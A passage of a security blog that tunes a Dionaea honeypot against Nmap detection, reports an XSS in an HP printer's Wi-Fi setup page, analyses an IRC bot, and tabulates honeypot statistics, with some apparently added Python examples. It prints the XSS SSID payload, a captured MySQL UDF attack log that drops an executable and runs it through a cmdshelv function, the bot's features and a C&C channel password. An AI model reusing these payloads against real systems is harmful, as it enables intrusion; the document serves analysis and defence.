If we check the HTTP Nmap probe, we can see that it is a static one, with no regexp. This probe is based on the HTTP headers and the HTML source code. There are at least two simple solutions. The HTTP service lists the directory content, so we can simply put a file in the /opt/dionaea/var/dionaea/wwwroot directory : the HTML source code will be different and won't match the probe anymore. The second solution is to modify the HTML code sent by Dionaea in /opt/dionaea/lib/dionaea/python/dionaea/http.py. For example, in list_directory(), we can change the DTD, the page title ...

The SMB probe provided by Nmap is based on the value of two fields of the SMB Negotiate Protocol Response : "OemDomainName" and "ServerName". Nmap expects to receive "WORKGROUP" and "HOMEUSER-XXXXXX" respectively, where X represents random data. It seems quite easy to mislead Nmap on the SMB service too. We just have to modify those values in the SMB_Negociate_Protocol_Response class of the file /opt/dionaea/lib/dionaea/python/dionaea/smb/include/smbfields.py. Let's try with "HINMAP" and "TRYHARDER".

You can see the results of our tricks just below. Sure, it's not perfect, but it's better than nothing ;-)

In this blog post, I've shown you how to use Nmap's probes to "protect" your honeypot, but you can also do the opposite and add new probes to get a more powerful Nmap. In addition, it would be interesting to modify the MSSQL behaviour and the SSL certificates to obtain a less verbose honeypot (look at the first scan for the SSL certificate details).

FYI : Markus, Dionaea's creator, won't change Dionaea to avoid detection by Nmap (or other scanners). It's a cat-and-mouse game he can't win, because some protocols are tricky to implement and modify, whereas Nmap probes are very easy to add. You can read this mail on the Nepenthes mailing list.

Monday, April 23, 2012

XSS on HP printer web interface

Yesterday I was watching a Defcon 19 talk about multi-function printer security, which was pretty fun. So this gave me an idea : what about mine ? Of course, I don't have a professional printer which can be connected to LDAP or whatever, but my printer (HP Deskjet 3070A) has network access too :)

According to Nmap, lots of TCP ports seem open :

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-22 21:16 CEST
Nmap scan report for HP7D7AA8 (192.168.1.23)
Host is up (0.28s latency).
Not shown: 65520 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
631/tcp  open  ipp
3910/tcp open  unknown
3911/tcp open  unknown
6839/tcp open  unknown
7435/tcp open  unknown
8080/tcp open  http-proxy
9100/tcp open  jetdirect
9101/tcp open  jetdirect
9102/tcp open  jetdirect
9110/tcp open  unknown
9111/tcp open  DragonIDSConsole
9112/tcp open  unknown
9220/tcp open  unknown
9290/tcp open  unknown
MAC Address: 2C:76:8A:7D:7A:A8 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 855.57 seconds

Ok cool, let's see the HTTP server and the Web interface ...

The printer's HTTP Server header is too verbose; it looks like :

HP HTTP Server; HP Deskjet 3070 B611 series - 012345; Serial Number: 0123456789ABCD; Munich_mp1 Built:Thu Apr 28, 2011 03:49:36PM {0123456789ABC, ASIC id 0x00340100}

Yes, we can get the serial number from the HTTP Server header :)


Now if we take a look at the web interface, we can find a fun XSS. As this printer is Wi-Fi capable, we can configure Wi-Fi through this interface. But what about an SSID like "<script> alert('owned?') </script>" ?

I'll let you set up your AP with the aforementioned SSID. Note that you can use an Android phone; it's quick and easy to configure :)

Once this Wi-Fi AP is set up, you can configure your printer to use it : Network > Wireless Setup Wizard (https://<IP>/#hId-setupPage).


Click on "Start Wizard" :

We can see our new AP :

Now if we select it and click on "Next", we get our XSS :D
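An added example, not the printer's code, showing the rendering bug described here beside its fix: the scanned-network list built with the SSID inserted verbatim into the page, and the same list with the SSID HTML-escaped for both the attribute and the text context. The scan results are constructed.

```python
import html

# Constructed scan results; the second SSID is the payload from the post.
SCAN_RESULTS = [
    {"ssid": "HomeNet", "signal": 70},
    {"ssid": "<script> alert('owned?') </script>", "signal": 55},
    {"ssid": 'Caf\u00e9 "Free" Wi-Fi', "signal": 40},
]


def render_unsafe(networks):
    """Reproduces the bug: the SSID goes into the HTML exactly as received over the air."""
    rows = []
    for n in networks:
        rows.append(f'<li><input type="radio" name="ssid" value="{n["ssid"]}"> '
                    f'{n["ssid"]} ({n["signal"]}%)</li>')
    return "<ul>" + "".join(rows) + "</ul>"


def render_safe(networks):
    """Same page, with each SSID escaped once for the attribute and once for the text node.
    quote=True also escapes the quotes, which is what keeps the attribute closed."""
    rows = []
    for n in networks:
        s = html.escape(n["ssid"], quote=True)
        rows.append(f'<li><input type="radio" name="ssid" value="{s}"> '
                    f'{s} ({int(n["signal"])}%)</li>')
    return "<ul>" + "".join(rows) + "</ul>"


def contains_live_script(page):
    """Crude check used here to compare the two renderings: an unescaped <script tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_unsafe(SCAN_RESULTS))
    print(render_safe(SCAN_RESULTS))
```

An SSID is up to 32 arbitrary octets chosen by whoever runs the access point, so a wireless setup page has to treat it like any other untrusted input: escape it at the point where it is written into HTML, and separately for a JavaScript string if the page also builds script from it.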


Sunday, January 29, 2012

Caught and analyzed

Last September, I was playing with the Dionaea honeypot, which is a great tool (see previous article). After having caught some malware, I wanted to analyse one sample.


Information about the file

According to the VirusTotal report, the file I chose to analyze is an IRC bot. VT shows an interesting piece of information : the malware seems to be packed with PolyCrypt. In fact the packer version is exactly PolyCrypt PE 2.1.5. During the analysis I found this string relating to the packer software : "PolyCrypt PE (c) 2004-2005, JLabSoftware.".

After unpacking, we can take a look at the imported DLLs and functions : details here

And now we can start the real work : reversing the malware !


Let's start the analysis


At startup, the malware creates a script file located at c:\a.bat. The script can be downloaded here.


The script creates the file 1.reg in the temp directory (c:\Documents and Settings\%user%\Local Settings\Temp), then runs regedit with the created .reg file before deleting 1.reg and itself.
The .reg file disables DCOM and RemoteConnect, restricts anonymous access, disables the admin shares (for example C$), changes a lot of TCP/IP parameters and increases the number of possible simultaneous connections to a single HTTP 1.0/1.1 server (50 and 50 instead of 4 and 2 respectively). The aim of this last registry modification is obviously to increase the effect of DoS attacks.

After this registry tweaking, the malware copies itself to c:\windows\system32\host.exe (host.exe is the original filename used during spreading). It sets the creation, modification and access times of host.exe to those of explorer.exe. Then it runs the copy, which deletes the original malware file.

The malware edits the registry so that it is executed after reboot : it adds an entry named "Windows Update" with "host.exe" as value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices} and under HKEY_CURRENT_USER\Software\Microsoft\OLE. Then a thread checks the running processes every 30 seconds against a list of around 600 process names. A second thread disables DCOM, restricts anonymous access and disables the IPC$ share every 2 minutes. The last thread checks every 120 milliseconds that the malware is still set to run at OS startup. After the creation of these 3 threads, Internet connectivity is checked every 30 seconds and, as soon as the victim host has Internet access, the payload is run.


Payload

Of course, as this malware is an IRC bot, it implements some IRC commands like USER, PASS, NICK, JOIN, PONG, NOTICE, PRIVMSG, QUIT... After each action, the bot sends a NOTICE or PRIVMSG message to the IRC C&C server to report whether the action succeeded.

This payload has many features :
- keylogger
- Ping, TCP, UDP, HTTP flood
- DNS cache flush
- ARP table flush
- send email (spam)
- search files and directories
- move files
- get information about the system : number of CPUs, CPU frequency, memory usage, disk space, disk type (network, cdrom ...), username, OS version (95, 98, ME, NT, 2000, 2003, XP or Unknown), user domain ...
- get information about the network : IP, hostname, connection type
- get serial of 42 games (Counter-Strike, FIFA 2003... whole list here), Windows product key and the customer number
- get clipboard data
- list running AV/FW and other "security products" (OllyDbg ...). The list contains around 600 processes.
- list registered services and their status (unknown, paused, pausing, continuing, starting, stoping, stoped, running, stopped)
- manage services
- restore the system in a healthy state (delete the registry key and the malware file)
- download and run binary files
- send files
- kill processes
- reverse shell (after authentication on the bot)
- update mechanism
- network sniffing
- TCP ports scan
- basic FTP server
- basic HTTP server used to download files and to send back file and directory search report
- brute-force SQL Server using a built-in list of around 1700 passwords (list here). If the logon succeeds, it downloads the malware via FTP and runs it through "EXEC master..xp_cmdshell".
- video recording using webcam
- screenshot capabilities
- add the C$, IPC$ and ADMIN$ network shares
- ...


Commands

A non-exhaustive list of IRC commands can be downloaded here.


C&C

Botnet owners use IRC to exchange information with the bots, send commands ... The domain name used to contact the C&C is blah.swXXXXXXXme.com and seems to be located in England (ISP : ValueVPS Limited - Hosting network). The IRC daemon used by this C&C server is UnrealIRCd 3.2.7, listening on port 7878. The listed channels are #GuardBot-Admin, #uk, #fuckoff and #b (joined by the bots). A password (imallowed2020) is required to join the #b channel.
Bot names look like [GSA]-123456.

Port 7878 isn't the only open port :
  • 80/tcp    open  http  Apache httpd 2.2.14 ((Fedora))
  • 99/tcp    open  ssh   OpenSSH 5.1 (protocol 2.0)
  • 6001/tcp  open  irc   Unreal ircd (used to link to other irc servers)
  • 7878/tcp  open  irc   Unreal ircd (used by irc clients)
  • 10000/tcp open  http  MiniServ 1.530 (Webmin httpd)
  • 65146/tcp open  irc   Unreal ircd (used by irc clients)

Apache hosts the default Apache web page, and on port 10000 we find the Webmin interface used to administer the server.
The OS seems to be Fedora 12 with a 2.6 kernel.

This C&C server doesn't control a huge botnet. I connected to this botnet several times, and the number of bots was between 467 and 1393. According to the IRC stats, the maximum number of IRC users (bots) was 4088.

STATS u
:pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20
:pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)

In addition, this server suffers from reliability problems. During my analysis it was sometimes unavailable (January 9th, 12th...).
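Counting a botnet by hand from the IRC traffic is tedious, so here is a small Python parser for the numerics involved. It is an added example, not code from the original post: the two STATS u lines are the ones quoted above, but the NAMES reply (numerics 353/366) and the nicknames in it are constructed, and the "[GSA]-" plus six digits nick pattern is taken from the example nick given in the text.

```python
import re

# Raw server-to-client lines. The two STATS u numerics (242, 250) are the ones
# quoted above; the NAMES reply (353/366) is a constructed sample with made-up
# nicknames, added to show how a bot headcount is taken from a channel listing.
SAMPLE_LINES = [
    ":pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20",
    ":pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)",
    ":pwned28.ircd.net 353 [GSA]-370921 @ #b :[GSA]-370921 [GSA]-123456 [GSA]-987654 @GuardAdmin lurker",
    ":pwned28.ircd.net 353 [GSA]-370921 @ #b :[GSA]-000001 [GSA]-42",
    ":pwned28.ircd.net 366 [GSA]-370921 #b :End of /NAMES list.",
]

# Bot nick pattern seen on this botnet: "[GSA]-" followed by six digits.
BOT_NICK = re.compile(r"^\[GSA\]-\d{6}$")
CHANNEL_STATUS_PREFIXES = "@+%~&"   # op, voice, halfop, owner, admin markers


def parse_irc_line(line):
    """Split ':prefix COMMAND params :trailing' into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    tokens = head.split()
    return prefix, tokens[0], tokens[1:], (trailing if sep else None)


def parse_stats_u(lines):
    """Pull uptime and the peak counters out of RPL_STATSUPTIME (242) and RPL_STATSCONN (250)."""
    out = {}
    for line in lines:
        _, cmd, _, trailing = parse_irc_line(line)
        if cmd == "242":
            m = re.search(r"Server Up (\d+) days?, (\d+):(\d+):(\d+)", trailing)
            d, h, mi, s = map(int, m.groups())
            out["uptime_seconds"] = ((d * 24 + h) * 60 + mi) * 60 + s
        elif cmd == "250":
            m = re.search(r"Highest connection count: (\d+) \((\d+) clients\)", trailing)
            out["highest_connections"] = int(m.group(1))
            out["clients"] = int(m.group(2))
    return out


def count_channel_members(lines, channel="#b"):
    """Count bot nicks vs. other nicks in the RPL_NAMREPLY (353) lines for one channel.
    Nicks are deduplicated across the (possibly many) 353 lines of one listing."""
    bots, others = set(), set()
    for line in lines:
        _, cmd, params, trailing = parse_irc_line(line)
        if cmd != "353" or not params or params[-1] != channel:
            continue
        for nick in trailing.split():
            nick = nick.lstrip(CHANNEL_STATUS_PREFIXES)
            (bots if BOT_NICK.match(nick) else others).add(nick)
    return len(bots), len(others)


if __name__ == "__main__":
    stats = parse_stats_u(SAMPLE_LINES)
    n_bots, n_others = count_channel_members(SAMPLE_LINES)
    print(f"uptime {stats['uptime_seconds']} s, peak {stats['highest_connections']} connections, "
          f"{stats['clients']} clients counted; #b now holds {n_bots} bots and {n_others} other nicks")
```

The nick regex is deliberately strict (exactly six digits), so a nick such as "[GSA]-42" in the constructed sample is counted with the operators and lurkers rather than with the bots; loosen it if the bot builder you are looking at pads differently.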


How to remove it?

As this malware isn't an advanced one, it's easy to remove from an infected computer. First, kill the "host.exe" process with Task Manager or another tool. Then delete the file "host.exe" located in c:\windows\system32\. With default view options the file is invisible: you need to uncheck "Hide protected operating system files" in the Windows folder view options. Finally, in the registry, delete the "Windows Update" entry stored under HKEY_CURRENT_USER\Software\Microsoft\OLE and under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices}. It would also be good to restore the other registry values modified by the a.bat file at the beginning of the infection, but you would need the original values to do that...
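When triaging several machines it is handier to check a registry export than to click through regedit. The following Python script is an added example, not part of the original post: it parses the text of a "reg export" (.reg) file, reports the "Windows Update" entries under the three persistence keys named above, and emits the removal commands in the order the text gives them. The .reg content is a constructed sample; the value data "host.exe" and the unrelated Adobe entry are assumptions made for the example.

```python
import re

# The three autostart locations named in the removal procedure above.
PERSISTENCE_KEYS = {
    r"HKEY_CURRENT_USER\Software\Microsoft\OLE",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",
}
VALUE_NAME = "Windows Update"

# Constructed .reg export (what "reg export <key> out.reg" would produce, already
# decoded from UTF-16). The data "host.exe" and the Adobe entry are made up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\OLE]
"Windows Update"="host.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="\"C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe\""
"Windows Update"="host.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Windows Update"="host.exe"
'''

# "Name"=data  (name may contain escaped quotes/backslashes)
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    # .reg files escape backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def _decode_data(data):
    # REG_SZ is written as a quoted string; dword:/hex: forms are kept verbatim
    if data.startswith('"') and data.endswith('"'):
        return _unescape(data[1:-1])
    return data


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: data}}."""
    registry, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            registry.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            registry[current][_unescape(m.group(1))] = _decode_data(m.group(2))
    return registry


def find_persistence(registry, value_name=VALUE_NAME, keys=PERSISTENCE_KEYS):
    """Return [(key, data)] for each persistence key holding the named value.
    Registry key and value names are case-insensitive, so compare lower-cased."""
    wanted = {k.lower() for k in keys}
    return [(key, data)
            for key, values in registry.items() if key.lower() in wanted
            for name, data in values.items() if name.lower() == value_name.lower()]


def removal_commands(hits, image="host.exe", path=r"c:\windows\system32\host.exe"):
    """Cleanup commands in the order given in the text: stop the process, clear the
    system+hidden attributes (otherwise del refuses the file), delete it, then remove
    every autostart entry that was found."""
    cmds = [f"taskkill /F /IM {image}", f'attrib -s -h "{path}"', f'del /F "{path}"']
    cmds += [f'reg delete "{key}" /v "{VALUE_NAME}" /f' for key, _ in hits]
    return cmds


if __name__ == "__main__":
    for cmd in removal_commands(find_persistence(parse_reg_export(SAMPLE_REG))):
        print(cmd)
```

The commands are printed rather than executed so they can be reviewed first; on a real machine the export is produced with "reg export" for each of the three keys and the UTF-16 output decoded before being fed to parse_reg_export.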


Comments

This malware isn't very stealthy: it can be found quite easily in the file system, and even more easily in Task Manager. Judging by the Windows versions the malware can detect and by its list of games, it is an old piece of malware with no advanced protection against reverse engineering.

Nowadays some (a lot of?) malware is developed by governments and cybercriminal groups. I think that's not the case for this trojan because of its simplicity, the unreliable C&C server and some strings found in it, like "Goodbye happy r00ting.", "NzmxFtpd Owns j0" and "Nice try, idiot.", which don't look professional.

I have found on the Internet a SNORT rules file which lists the IP addresses used by the C&C server. So if you have an IDS in your company, you can use this rules file, which contains a list of known C&C servers, to generate alerts when a host is communicating with one of these servers.

Sunday, October 9, 2011

Some stats of my dionaea honeypot

Last month my PC ran the Dionaea honeypot during two periods of a few days. So I decided to share some statistics about the attacked services, the location of the attackers, the attackers' OS...
I also list the SQL queries used to get this information.


P0f information

P0f is a passive OS fingerprinting tool that analyses network traffic to infer information such as operating system version, firewall presence, NAT use, distance to the remote host and the kind of link used.
FYI: you need to enable p0f in the Dionaea configuration file and run the p0f tool in order to collect this data.

select count(p0f_genre||p0f_detail) as count, (p0f_genre || ' ' || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc;

count  OS
 7509  (empty)
  104  Windows 2000 SP4, XP SP1+
   46  Windows XP/2000 (RFC1323+, w+, tstamp-)
   31  Windows 2000 SP2+, XP SP1+ (seldom 98)
   17  Linux 2.6 (newer, 3)
   11  Linux 2.6 (newer, 2)
    8  Windows XP SP1+, 2000 SP3
    7  Linux 2.4-2.6
    6  Windows XP/2000 (RFC1323+, w, tstamp+)
    3  Windows 95
    2  SunOS 4.1.x
    1  Linux 2.6? (barebone, rare!)
    1  Windows 98 (no sack)


select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;


count  link
 6051  (empty)
 1533  ethernet/modem
  101  pppoe (DSL)
   39  IPv6/IPIP
   10  (Google/AOL)
    5  GPRS, T1, FreeS/WAN
    3  PIX, SMC, sometimes wireless
    3  sometimes DSL (2)
    1  vtun


Targeted local port

select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;

count  targeted port
 1201  42
  335  80
  123  135
  113  1433
   87  32554
   72  32045
   61  5060
   38  3389
   38  8008
   37  23
  ...
   18  445
  ...

The services most targeted here are WINS, web servers, epmap/DCOM, SQL Server, SIP, RDP and Telnet.


Location of attackers / malware sources

select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;


If we look at the map, we can see a lot of connections from France. But I can explain some of them: while my honeypot was running, I launched some port scans. In order to have reliable statistics, I removed from the sqlite database the connections coming from my IP, but I think I missed some of them.


Protocol informations

select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;

count  connection_transport
 6959  tcp
   85  udp
   13  tls


select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;

count  connection_protocol
 3929  pcap
 1204  mirrorc
 1201  mirrord
  335  httpd
  123  epmapper
  113  mssqld
   70  SipSession
   54  TftpClient
   17  smbd
    7  mysqld
    4  SipCall



Default passwords

select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;

count  login_username  login_password  connection_protocol  local_port
   95  sa              (empty)         mssqld               1433
    6  root            (empty)         mysqld               3306


Malware targeting my honeypot tried to connect to MySQL as root with an empty password and to Microsoft SQL Server as sa with an empty password, which are both default credentials.
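The queries above can be reproduced without a live honeypot. The following Python script is an added example, not code from the original post or from the Dionaea project: it builds an in-memory sqlite database with the subset of Dionaea's logsql schema that the queries touch (connections and logins), fills it with constructed rows, and runs the same three breakdowns. Two details from the text are folded in: the analyst's own scanning IP is excluded with a parameter rather than by deleting rows, and credentials are grouped on separate columns rather than on the concatenation login_username||login_password, which would merge distinct pairs such as ("ab","c") and ("a","bc"). The IP addresses and counts are constructed sample data.

```python
import sqlite3

# Subset of dionaea's logsql sqlite schema: only the columns the queries use.
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY,
    connection_transport TEXT,
    connection_protocol TEXT,
    local_port INTEGER,
    remote_host TEXT
);
CREATE TABLE logins (
    login INTEGER PRIMARY KEY,
    connection INTEGER REFERENCES connections(connection),
    login_username TEXT,
    login_password TEXT
);
"""

ANALYST_IP = "192.0.2.10"   # hypothetical: the honeypot owner's own scanning box

# Constructed sample rows: (id, transport, protocol, local_port, remote_host)
SAMPLE_CONNECTIONS = [
    (1, "tcp", "mssqld", 1433, "203.0.113.5"),
    (2, "tcp", "mssqld", 1433, "203.0.113.5"),
    (3, "tcp", "mysqld", 3306, "198.51.100.7"),
    (4, "tcp", "epmapper", 135, "203.0.113.9"),
    (5, "tcp", "httpd", 80, "198.51.100.7"),
    (6, "udp", "SipSession", 5060, "203.0.113.20"),
    (7, "tcp", "pcap", 42, ANALYST_IP),      # the analyst's own port scan
    (8, "tcp", "pcap", 80, ANALYST_IP),
    (9, "tcp", "pcap", 3389, ANALYST_IP),
]
# (id, connection, username, password); empty string = no password sent
SAMPLE_LOGINS = [
    (1, 1, "sa", ""),
    (2, 2, "sa", ""),
    (3, 3, "root", ""),
]


def load_sample():
    """Create the in-memory database and load the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO connections VALUES (?,?,?,?,?)", SAMPLE_CONNECTIONS)
    db.executemany("INSERT INTO logins VALUES (?,?,?,?)", SAMPLE_LOGINS)
    return db


def targeted_ports(db, exclude_host=None):
    """Hits per local port, most targeted first. 'IS NOT ?' with None keeps
    every row, so the same query serves the filtered and unfiltered view."""
    return db.execute(
        "SELECT local_port, count(*) AS hits FROM connections "
        "WHERE remote_host IS NOT ? "
        "GROUP BY local_port ORDER BY hits DESC, local_port",
        (exclude_host,),
    ).fetchall()


def protocol_breakdown(db, exclude_host=None):
    """Connections per dionaea service module, most hit first."""
    return db.execute(
        "SELECT connection_protocol, count(*) AS hits FROM connections "
        "WHERE remote_host IS NOT ? "
        "GROUP BY connection_protocol ORDER BY hits DESC, connection_protocol",
        (exclude_host,),
    ).fetchall()


def credential_attempts(db):
    """Username/password pairs tried, joined back to the service and port they hit.
    Grouping on the separate columns avoids merging distinct pairs."""
    return db.execute(
        "SELECT count(*) AS hits, l.login_username, l.login_password, "
        "c.connection_protocol, c.local_port "
        "FROM logins l JOIN connections c ON c.connection = l.connection "
        "GROUP BY l.login_username, l.login_password, c.connection_protocol, c.local_port "
        "ORDER BY hits DESC"
    ).fetchall()


if __name__ == "__main__":
    db = load_sample()
    print("ports (own scans removed):", targeted_ports(db, ANALYST_IP))
    print("protocols:", protocol_breakdown(db, ANALYST_IP))
    print("credentials:", credential_attempts(db))
```

Against a real capture, replace load_sample() with sqlite3.connect("logsql.sqlite") and pass your own address as exclude_host; the 'pcap' protocol rows are Dionaea's record of connections to ports it was not actually serving, which is exactly what a port scan leaves behind.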



MySQL requests

select * from mysql_command_args;

The output of this query is quite fun:
drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');

For more information, you can read this article: http://carnivore.it/2011/06/12/the_mysql_cmdshelv



RPC vulnerabilities

select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceops.dcerpcserviceop_vuln != '';

dcerpcservice_name  dcerpcserviceop_name           dcerpcserviceop_vuln
DCOM                RemoteActivation               MS03-26
DSSETUP             DsRolerUpgradeDownlevelServer  MS04-11
ISystemActivator    RemoteCreateInstance           MS04-12
MSMQ                QMCreateObjectInternal         MS07-065
MSMQ                QMDeleteObject                 MS05-017
NWWKS               NwChangePassword               MS06-66
NWWKS               NwOpenEnumNdsSubTrees          MS06-66
PNP                 PNP_QueryResConfList           MS05-39
SRVSVC              NetPathCanonicalize            MS08-67
SRVSVC              NetPathCompare                 MS08-67
WKSSVC              NetAddAlternateComputerName    MS03-39
nddeapi             NDdeSetTrustedShareW           MS04-031



Malware URLs

select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;

All the malware was downloaded from TFTP servers, and every download is linked to a connection on port 135. As the URLs point to live malware, I won't show them here.



Virustotal reports

select virustotal_permalink from virustotals;

http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380

All these URLs are VirusTotal reports of the malware captured by my honeypot. Most of them were submitted to VirusTotal this summer. According to the reports, they are all IRC bots. As the detection rate is high (between 93% and 98%), they are not a serious threat for our computers as long as the user is not careless.